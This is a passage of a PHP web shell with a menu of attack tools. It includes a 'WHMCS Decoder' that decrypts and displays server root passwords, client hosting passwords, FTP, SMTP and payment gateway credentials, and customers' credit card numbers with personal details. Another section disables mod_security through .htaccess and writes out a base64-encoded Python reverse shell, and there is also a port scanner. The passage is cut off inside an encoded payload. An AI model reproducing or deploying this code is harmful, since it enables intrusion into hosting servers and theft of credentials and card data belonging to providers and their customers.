  3186.  
  3187. echo "<center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Reverse Domain ip Lookup</span></center>
  3188. ";
  3189. echo "<div id=result>";
  3190. echo "<center><br><form><input type='text' size='60' placeholder='watch8x.com' name='setan' /><input type='hidden' name='do' value='tetangga'> &nbsp;<input type='submit' value='&nbsp;&check;&nbsp;'></form></center>";
  3191. if(isset($_GET["setan"]))
  3192. {
  3193. $site = $_GET["setan"];
  3194. $setan = "http://domains.yougetsignal.com/domains.php";
  3195.  
  3196. //Curl Function
  3197. $ch = curl_init($setan);
  3198. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3199. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$site&ket=");
  3200. curl_setopt($ch, CURLOPT_HEADER, 0);
  3201. curl_setopt($ch, CURLOPT_POST, 1);
  3202. $resp = curl_exec($ch);
  3203. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3204. $array = explode(",,", $resp);
  3205. unset($array[0]);
  3206. echo "<table style='margin: 0 auto'>";
  3207. foreach($array as $lnk)
  3208. {
  3209. print "<tr><td><a style=\"color:#0f0;font-weight:bold;\" href='$lnk' target=_blank>$lnk</a></td></tr>";
  3210. }
  3211. echo "</table>";
  3212. curl_close($ch);
  3213. }
  3214. }
  3215. elseif($_GET['do'] == 'whmcs') {
  3216. echo "<center>";
  3217. echo "<ul>";
  3218. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3219. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3220. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3221. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3222. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3223. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3224. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3225. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3226. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3227. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3228. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3229. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3230. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3231. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3232. echo "</ul>";
  3233. echo "</center>";
  3234.  
  3235. echo"<p><br/><body>
  3236. <center><br/><br/><nobr><b><span>WHMCS DECODER</span></b></nobr><br/><br/>
  3237. <p><form method='post'>
  3238. <table border=1>
  3239. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu1' value='localhost'></td></tr>
  3240. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu2'></td></tr>
  3241. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu3'></td></tr>
  3242. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu4'></td></tr>
  3243. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:transparent' type='text' size='60' name='anu5'></td></tr>
  3244. <tr><td align='center' colspan='2'><input class=submit type='submit' style='color:#FF0000;background-color:transparent' value=' HAJAR ' name='plapon'></td></tr>
  3245.  
  3246. </table>
  3247. <br></form></center>";
  3248.  
  3249.  
  3250. $perawan = $_POST['anu1'];
  3251. $kimcil = $_POST['anu2'];
  3252. $janda = $_POST['anu3'];
  3253. $hotel = $_POST['anu4'];
  3254. $kondom = $_POST['anu5'];
  3255. @mysql_connect($perawan, $kimcil, $janda);
  3256. @mysql_select_db($hotel);
  3257. $cc_encryption_hash = $kondom;
  3258. function dec($string, $cc_encryption_hash) {
  3259. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
  3260. $hash_key = _hash($key);
  3261. $hash_length = strlen($hash_key);
  3262. $string = base64_decode($string);
  3263. $tmp_iv = substr($string, 0, $hash_length);
  3264. $string = substr($string, $hash_length, strlen($string) - $hash_length);
  3265. $iv = $out = '';
  3266. $c = 0;
  3267. while ($c < $hash_length) {
  3268. $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
  3269. ++$c;
  3270. }
  3271. $key = $iv;
  3272. $c = 0;
  3273. while ($c < strlen($string)) {
  3274. if (($c != 0 AND $c % $hash_length == 0)) {
  3275. $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
  3276. }
  3277. $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
  3278. ++$c;
  3279. }
  3280. return $out;
  3281. }
  3282. function _hash($string) {
  3283. $hash = (function_exists('sha1')) ? sha1($string) : md5($string);
  3284. $out = '';
  3285. $c = 0;
  3286. while ($c < strlen($hash)) {
  3287. $out.= chr(hexdec($hash[$c] . $hash[$c + 1]));
  3288. $c+= 2;
  3289. }
  3290. return $out;
  3291. }
  3292. ######## GO TO HELL ########
  3293. ##### :D ########### :D #####
  3294. if (isset($_POST['plapon'])) {
  3295. $query = mysql_query("SELECT *FROM tblservers");
  3296. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3297. <tr><th colspan='7'> <span> HOST ROOT </span> </th></tr>
  3298. <tr>
  3299. <th class='th_home' align='center'><b>TYPE</b></th>
  3300. <th class='th_home' align='center'><b>ACTIVE</b></th>
  3301. <th class='th_home' align='center'><b>HOSTNAME</b></th>
  3302. <th class='th_home' align='center'><b>IP ADDRESS</b></th>
  3303. <th class='th_home' align='center'><b>USERNAME</b></th>
  3304. <th class='th_home' align='center'><b>PASSWORD</b></th>
  3305. <th class='th_home' align='center'><b>ACCESS HASH</b></th></tr>";
  3306. if (!is_array(mysql_fetch_array($query))) {
  3307. echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
  3308. }
  3309. while ($v = mysql_fetch_array($query)) {
  3310. echo "<tr>
  3311. <td class='td_home' align='center'>{$v['type']}</td>
  3312. <td class='td_home' align='center'>{$v['active']}</td>
  3313. <td class='td_home' align='center'>{$v['hostname']}</td>
  3314. <td class='td_home' align='center'>{$v['ipaddress']}</td>
  3315. <td class='td_home' align='center'>{$v['username']}</td>
  3316. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
  3317. <td class='td_home' align='center'>{$v['accesshash']}</td>
  3318. </tr>";
  3319. }
  3320. echo "</table>";
  3321. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
  3322. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3323. <tr><th colspan='6'><span>CLIENTS ROOT</span> </th></tr>
  3324.  
  3325. <tr>
  3326. <th class='th_home' align='center'><b> DOMAIN</b></th>
  3327. <th class='th_home' align='center'><b> STATUS</b></th>
  3328. <th class='th_home' align='center'><b> USERNAME</b></th>
  3329. <th class='th_home' align='center'><b> PASSWORD</b></th>
  3330. <th class='th_home' align='center'><b> DEDICATED IP</b></th>
  3331. <th class='th_home' align='center'><b> ASSIGNED IP</b></th></tr>";
  3332. if (!is_array(mysql_fetch_array($query))) {
  3333. echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
  3334. }
  3335. while ($v = mysql_fetch_array($query)) {
  3336. echo "<tr>
  3337. <td class='td_home' align='center'> {$v['domain']}</td>
  3338. <td class='td_home' align='center'> {$v['domainstatus']}</td>
  3339. <td class='td_home' align='center'> {$v['username']}</td>
  3340. <td class='td_home' align='center'> " . dec($v['password'], $cc_encryption_hash) . "</td>
  3341. <td class='td_home' align='center'> {$v['dedicatedip']}</td>
  3342. <td class='td_home' align='center'> {$v['assignedips']}</td></tr>";
  3343. }
  3344. echo "</table>";
  3345. $query = mysql_query("SELECT *FROM tblregistrars");
  3346. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3347. <tr><th colspan='3'><nobr><span> DOMAIN REGISTRAR </span></nobr></th></tr>
  3348. <tr>
  3349. <th class='th_home' align='center'><b>REGISTRAR</b></th>
  3350. <th class='th_home' align='center'><b>SETTING</b></th>
  3351. <th class='th_home' align='center'><b>VALUE</b></th></tr>";
  3352. if (!is_array(mysql_fetch_array($query))) {
  3353. echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
  3354. }
  3355. while ($v = mysql_fetch_array($query)) {
  3356. $value = (!dec($v['value'], $cc_encryption_hash)) ? "0" : dec($v['value'], $cc_encryption_hash);
  3357. echo "<tr>
  3358. <td class='td_home' align='center'>{$v['registrar']}</td>
  3359. <td class='td_home' align='center'>{$v['setting']}</td>
  3360. <td class='td_home' align='center'>$value</td></tr>";
  3361. }
  3362. echo "</table>";
  3363. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  3364. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3365. <tr><th colspan='4'> <span> FTP BACKUP </span> </th></tr>
  3366.  
  3367. <tr>
  3368. <th class='th_home' align='center'><b>FTP HOSTNAME</b></th>
  3369. <th class='th_home' align='center'><b>FTP USERNAME</b></th>
  3370. <th class='th_home' align='center'><b>FTP PASSWORD</b></th>
  3371. <th class='th_home' align='center'><b>DESTINATION</b></th></tr>";
  3372. $ftpb = array('FTPBackupHostname', 'FTPBackupUsername', 'FTPBackupPassword', 'FTPBackupDestination');
  3373. if (!is_array(mysql_fetch_array($query))) {
  3374. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  3375. }
  3376. while ($row = mysql_fetch_array($query)) {
  3377. if ($row[setting] == $ftpb[0]) {
  3378. echo "<tr><td class='td_home'>{$row[value]}</td>";
  3379. $ftpb[0] = xxx;
  3380. } elseif ($row[setting] == $ftpb[1]) {
  3381. echo "<td class='td_home'>{$row[value]}</td>";
  3382. $ftpb[1] = xxx;
  3383. } elseif ($row[setting] == $ftpb[2]) {
  3384. echo "<td class='td_home'>{$row[value]}</td>";
  3385. $ftpb[2] = xxx;
  3386. } elseif ($row[setting] == $ftpb[3]) {
  3387. echo "<td class='td_home'>{$row[value]}</td>";
  3388. $ftpb[3] = xxx;
  3389. }
  3390. }
  3391. echo "</table>";
  3392. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  3393. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3394. <tr><th colspan='4'><span> SMTP SERVER </span> </th></tr>
  3395. <tr>
  3396. <th class='th_home' align='center'><b>SMTP HOST</b></th>
  3397. <th class='th_home' align='center'><b>SMTP USER</b></th>
  3398. <th class='th_home' align='center'><b>SMTP PASS</b></th>
  3399. <th class='th_home' align='center'><b>SMTP PORT</b></th></tr>";
  3400. $smtp = array('SMTPHost', 'SMTPUsername', 'SMTPPassword', 'SMTPPort');
  3401. if (!is_array(mysql_fetch_array($query))) {
  3402. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  3403. }
  3404. while ($row = mysql_fetch_array($query)) {
  3405. if ($row[setting] == $smtp[0]) {
  3406. echo "<tr><td class='td_home'>{$row[value]}</td>";
  3407. $smtp[0] = xxx;
  3408. } elseif ($row[setting] == $smtp[1]) {
  3409. echo "<td class='td_home'>{$row[value]}</td>";
  3410. $smtp[1] = xxx;
  3411. } elseif ($row[setting] == $smtp[2]) {
  3412. echo "<td class='td_home'>{$row[value]}</td>";
  3413. $smtp[2] = xxx;
  3414. } elseif ($row[setting] == $smtp[3]) {
  3415. echo "<td class='td_home'>{$row[value]}</td>";
  3416. $smtp[3] = xxx;
  3417. }
  3418. }
  3419. echo "</table>";
  3420. $query = mysql_query("SELECT *FROM tblpaymentgateways");
  3421. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3422. <tr><th colspan='4'><nobr><span> PAYMENTS GATEWAY </span></nobr></th></tr>
  3423.  
  3424. <tr>
  3425. <th class='th_home' align='center'><b>GATEWAY</b></th>
  3426. <th class='th_home' align='center'><b>SETTING</b></th>
  3427. <th class='th_home' align='center'><b>VALUE</b></th>
  3428. <th class='th_home' align='center'><b>ORDER</b></th></tr>";
  3429. if (!is_array(mysql_fetch_array($query))) {
  3430. echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
  3431. }
  3432. while ($v = mysql_fetch_array($query)) {
  3433. echo "<tr>
  3434. <td class='td_home' align='center'>{$v['gateway']}</td>
  3435. <td class='td_home' align='center'>{$v['setting']}</td>
  3436. <td class='td_home' align='center'>{$v['value']}</td>
  3437. <td class='td_home' align='center'>{$v['order']}</td> </tr>";
  3438. }
  3439. echo "</table>";
  3440. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  3441. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3442. <tr><th colspan='10'><nobr><span> CLIENTS CREDIT CARD </span></nobr></th></tr>
  3443. <tr>
  3444. <th class='th_home' align='center'><b>CardType</b></th>
  3445. <th class='th_home' align='center'><b>CardNumb</b></th>
  3446. <th class='th_home' align='center'><b>Expdate</b></th>
  3447. <th class='th_home' align='center'><b>IssueNumber</b></th>
  3448. <th class='th_home' align='center'><b>FirstName</b></th>
  3449. <th class='th_home' align='center'><b>LastName</b></th>
  3450. <th class='th_home' align='center'><b>Address</b></th>
  3451. <th class='th_home' align='center'><b>Country</b></th>
  3452. <th class='th_home' align='center'><b>Phone</b></th>
  3453. <th class='th_home' align='center'><b>Email</b></th>
  3454. </tr>";
  3455. if (!is_array(mysql_fetch_array($query))) {
  3456. echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
  3457. }
  3458. while ($v = mysql_fetch_array($query)) {
  3459. $cchash = md5($cc_encryption_hash . $v['0']);
  3460. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='" . $v['0'] . "'");
  3461. $v2 = mysql_fetch_array($s);
  3462. echo "<tr>
  3463. <td class='td_home' align='center'>" . $v2['cardtype'] . "</td>
  3464. <td class='td_home' align='center'>" . $v2['cardnum'] . "</td>
  3465. <td class='td_home' align='center'>" . $v2['expdate'] . "</td>
  3466. <td class='td_home' align='center'>" . $v2['issuenumber'] . "</td>
  3467. <td class='td_home' align='center'>" . $v2['firstname'] . "</td>
  3468. <td class='td_home' align='center'>" . $v2['lastname'] . "</td>
  3469. <td class='td_home' align='center'>" . $v2['address1'] . "</td>
  3470. <td class='td_home' align='center'>" . $v2['country'] . "</td>
  3471. <td class='td_home' align='center'>" . $v2['phonenumber'] . "</td>
  3472. <td class='td_home' align='center'>" . $v2['email'] . "</td></tr>";
  3473. }
  3474. echo "</table>";
  3475. $query = mysql_query("SELECT *FROM tblhosting");
  3476. echo "<br/><br/><center>
  3477. <table class='table_home' style=width:830px;padding:0 1px;>
  3478. <tr><th colspan='6'><nobr><span> CLIENTS HOSTING ACCOUNT </span></nobr></th></tr>
  3479. <tr>
  3480. <th class='th_home' align='center'><b>DOMAIN</b></th>
  3481. <th class='th_home' align='center'><b>STATUS</b></th>
  3482. <th class='th_home' align='center'><b>USERNAME</b></th>
  3483. <th class='th_home' align='center'><b>PASSWORD</b></th>
  3484. <th class='th_home' align='center'><b>DEDICATED IP</b></th>
  3485. <th class='th_home' align='center'><b>ASSIGNED IP</b></th></tr>";
  3486. if (!is_array(mysql_fetch_array($query))) {
  3487. echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  3488. }
  3489. while ($v = mysql_fetch_array($query)) {
  3490. echo "<tr>
  3491. <td class='td_home' align='center'>{$v['domain']}</td>
  3492. <td class='td_home' align='center'>{$v['domainstatus']}</td>
  3493. <td class='td_home' align='center'>{$v['username']}</td>
  3494. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
  3495. <td class='td_home' align='center'>{$v['dedicatedip']}</td>
  3496. <td class='td_home' align='center'>{$v['assignedips']}</td></tr>";
  3497. }
  3498. echo "</table>";
  3499. }
  3500. }
  3501. elseif($_GET['do'] == 'hash') {
  3502. echo "<center>";
  3503. echo "<ul>";
  3504. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3505. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3506. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3507. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3508. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3509. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3510. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3511. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3512. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3513. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3514. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3515. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3516. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3517. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3518. echo "</ul>";
  3519. echo "</center>";
  3520. if (isset($_POST['gethash'])) {
  3521. $hash = $_POST['hash'];
  3522. if (strlen($hash) == 32) {
  3523. $hashresult = "MD5 Hash";
  3524. } elseif (strlen($hash) == 40) {
  3525. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  3526. } elseif (strlen($hash) == 13) {
  3527. $hashresult = "DES(Unix) Hash";
  3528. } elseif (strlen($hash) == 16) {
  3529. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  3530. } elseif (strlen($hash) == 41) {
  3531. $GetHashChar = substr($hash, 40);
  3532. if ($GetHashChar == "*") {
  3533. $hashresult = "MySQL5 Hash";
  3534. }
  3535. } elseif (strlen($hash) == 64) {
  3536. $hashresult = "SHA-256 Hash";
  3537. } elseif (strlen($hash) == 96) {
  3538. $hashresult = "SHA-384 Hash";
  3539. } elseif (strlen($hash) == 128) {
  3540. $hashresult = "SHA-512 Hash";
  3541. } elseif (strlen($hash) == 34) {
  3542. if (strstr($hash, '$1$')) {
  3543. $hashresult = "MD5(Unix) Hash";
  3544. }
  3545. } elseif (strlen($hash) == 37) {
  3546. if (strstr($hash, '$apr1$')) {
  3547. $hashresult = "MD5(APR) Hash";
  3548. }
  3549. } elseif (strlen($hash) == 34) {
  3550. if (strstr($hash, '$H$')) {
  3551. $hashresult = "MD5(phpBB3) Hash";
  3552. }
  3553. } elseif (strlen($hash) == 34) {
  3554. if (strstr($hash, '$P$')) {
  3555. $hashresult = "MD5(Wordpress) Hash";
  3556. }
  3557. } elseif (strlen($hash) == 39) {
  3558. if (strstr($hash, '$5$')) {
  3559. $hashresult = "SHA-256(Unix) Hash";
  3560. }
  3561. } elseif (strlen($hash) == 39) {
  3562. if (strstr($hash, '$6$')) {
  3563. $hashresult = "SHA-512(Unix) Hash";
  3564. }
  3565. } elseif (strlen($hash) == 24) {
  3566. if (strstr($hash, '==')) {
  3567. $hashresult = "MD5(Base-64) Hash";
  3568. }
  3569. } else {
  3570. $hashresult = "Hash type not found";
  3571. }
  3572. } else {
  3573. $hashresult = "<center>Not Hash Entered</center>";
  3574. }
  3575.  
  3576. echo"<center>
  3577.  
  3578. <form action='' method='POST'>
  3579. <tr>
  3580. <th colspan='5'>Hash Identification</th><br><br>
  3581. <tr class='optionstr'><B><td>Enter Hash :</td><br></b><td></td> <td><input type='text' name='hash' size='60' class='inputz' /></td><td><input type='submit' class='inputzbut' name='gethash' value='Identify Hash' /></td></tr><br>
  3582. <tr class='optionstr'><b><td>Result</td><td>:</td><td></td></tr></b>
  3583. </tr></form>
  3584. </center>";
  3585. echo "<center>$hashresult</center>";
  3586.  
  3587. }
  3588. elseif($_GET['do'] == 'portsc') {
  3589. echo "<center>";
  3590. echo "<ul>";
  3591. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3592. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3593. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3594. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3595. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3596. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3597. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3598. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3599. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3600. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3601. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3602. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3603. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3604. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3605. echo "</ul>";
  3606. echo "</center>";
  3607. echo"<form action='' method='post'>" ;
  3608. $start = strip_tags($_POST['start']);
  3609. $end = strip_tags($_POST['end']);
  3610. $host = strip_tags($_POST['host']);
  3611. if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
  3612. for ($i = $start;$i <= $end;$i++) {
  3613. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  3614. if ($fp) {
  3615. echo 'Port ' . $i . ' is <font color=green>open</font><br>';
  3616. }
  3617. flush();
  3618. }
  3619. } else {
  3620. echo '<center><table class=tabnet style="width:300px;padding:0 1px;">
  3621. <input type="hidden" name="y" value="phptools">
  3622. <tr><th colspan="5">Port Scanner</th></center></tr>
  3623. <tr>
  3624. <td>Host</td>
  3625. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
  3626. </tr>
  3627. <tr>
  3628. <td>Port start</td>
  3629. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
  3630. </tr>
  3631. <tr><td>Port end</td>
  3632. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
  3633. </tr><td><center><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
  3634. </td></form></center></table>';
  3635. }
  3636.  
  3637. }
  3638. elseif($_GET['do'] == 'ptbc') {
  3639. echo "<center>";
  3640. echo "<ul>";
  3641. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3642. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3643. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3644. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3645. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3646. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3647. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3648. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3649. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3650. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3651. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3652. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3653. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3654. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3655. echo "</ul>";
  3656. echo "</center>";
  3657. mkdir('pyrevrshell', 0755);
  3658. chdir('pyrevrshell');
  3659. $seropil = ".htaccess";
  3660. $angelinalll = "$seropil";
  3661. $shitttyz = fopen ($angelinalll , 'w') or die ("shitttyz a&#231;&#305;lamad&#305;!");
  3662. $dffvfdgfg = "<IfModule mod_security.c>
  3663. SecFilterEngine Off
  3664. SecFilterScanPOST Off
  3665. </IfModule>";
  3666. fwrite ( $shitttyz , $dffvfdgfg ) ;
  3667. fclose ($shitttyz);
  3668. //extract python reverse script
  3669. $vkffhd = 'IyEvdXNyL2Jpbi9weXRob24NCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHNvY2tldA0KaW1wb3J0IHB0eQ0KIA0Kc2hlbGwgPSAiL2Jpbi9zaCINCiANCmRlZiB1c2FnZShwcm9ncmFtbmFtZSk6DQpwcmludCAieXRob24gY29ubmVjdC1iYWNrIGRvb3IiDQpwcmludCAiVXNhZ2U6ICVzIDxjb25uX2JhY2tfaXA+IDxwb3J0PiIgJSBwcm9ncmFtbmFtZQ0KIA0KZGVmIG1haW4oKToNCmlmIGxlbihzeXMuYXJndikgIT0zOg0KdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQpzeXMuZXhpdCgxKQ0KIA0KcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KIA0KdHJ5Og0Kcy5jb25uZWN0KChzb2NrZXQuZ2V0aG9zdGJ5bmFtZShzeXMuYXJndlsxXSksaW50KHN5cy5hcmd2WzJdKSkpDQpwcmludCAiWytdQ29ubmVjdCBPSy4iDQpleGNlcHQ6DQpwcmludCAiWy1dQ2FuJ3QgY29ubmVjdCINCnN5cy5leGl0KDIpDQogDQpvcy5kdXAyKHMuZmlsZW5vKCksMCkNCm9zLmR1cDIocy5maWxlbm8oKSwxKQ0Kb3MuZHVwMihzLmZpbGVubygpLDIpDQpnbG9iYWwgc2hlbGwNCm9zLnVuc2V0ZW52KCJISVNURklMRSIpDQpvcy51bnNldGVudigiSElTVEZJTEVTSVpFIikNCnB0eS5zcGF3bihzaGVsbCkNCnMuY2xvc2UoKQ0KIA0KaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoNCm1haW4oKQ==';
  3670.  
  3671. $jkol = fopen("reversesh.py" ,"w+");
  3672. $write = fwrite ($jkol ,base64_decode($vkffhd));
  3673. fclose($jkol);
  3674. chmod("reversesh.py",0755);
  3675.  
  3676. //extract php command shell
  3677. $merdeeeee = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQeXRob24gQ29ubmVjdCBTaGVsbCBQcml2ODwvdGl0bGU+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3MTQuMHp6MC5jb20vMjAxNC8wNi8wNC8yMS8zOTY1NTQzOTQucG5nIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50ICFpbXBvcnRhbnQ7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4O30gICAgICBhe3RleHQtZGVjb3JhdGlvbjpub25lOyBmb250LWZhbWlseTogVGFob21hLCBHZW5ldmE7IGNvbG9yOiMwMDc3MDA7IHBhZGRpbmc6MnB4IDJweDt9ICAgICAgYTpob3Zlcntjb2xvcjojMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDBmZjAwIDBweCAwcHggM3B4O30JICAuYXJlYSB7IGNvbG9yOiAjMDBiYjAwOyBmb250LXNpemU6IDlwdDsgdGV4dC1zaGFkb3c6IzAwMDAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiBzb2xpZCAwcHggIzAwNzcwMDsgYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwOTkwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgfQkgIGlucHV0W3R5cGU9c3VibWl0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwNzcwOyAgZm9udC13ZWlnaHQ6IGJvbGQ7IHRleHQtYWxpZ246IGNlbnRlcjsgIHRleHQtc2hhZG93OiAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuMyk7ICBiYWNrZ3JvdW5kOiAjYWVhZWFlOyAgYmFja2